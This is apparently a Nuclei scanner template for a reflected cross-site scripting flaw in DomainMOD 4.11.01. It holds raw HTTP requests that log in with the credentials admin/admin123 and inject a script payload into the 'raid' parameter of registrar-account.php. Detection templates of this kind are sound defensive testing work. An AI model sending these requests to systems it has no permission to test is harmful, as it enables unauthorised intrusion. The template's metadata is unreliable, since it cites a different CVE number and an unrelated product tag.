nuclei-templates/cves/2018/CVE-2018-19136.yaml

50 lines
1.2 KiB
YAML
Raw Normal View History

2022-07-07 19:54:09 +00:00
id: CVE-2018-19136
info:
name: DomainMOD 4.11.01 - 'assets/edit/registrar-account.php' Reflected Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/registrar-account.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
- https://www.exploit-db.com/exploits/45883/
metadata:
verified: true
tags: wbcecms,xss
requests:
- raw:
- |
POST /domain/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username=admin&new_password=admin123
- |
GET /domain/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&del=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cookie-reuse: true
matchers-condition: and
max-redirects: 3
matchers:
- type: word
part: body
words:
- "<script>alert(1)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
2022-07-08 22:22:26 +00:00
- 200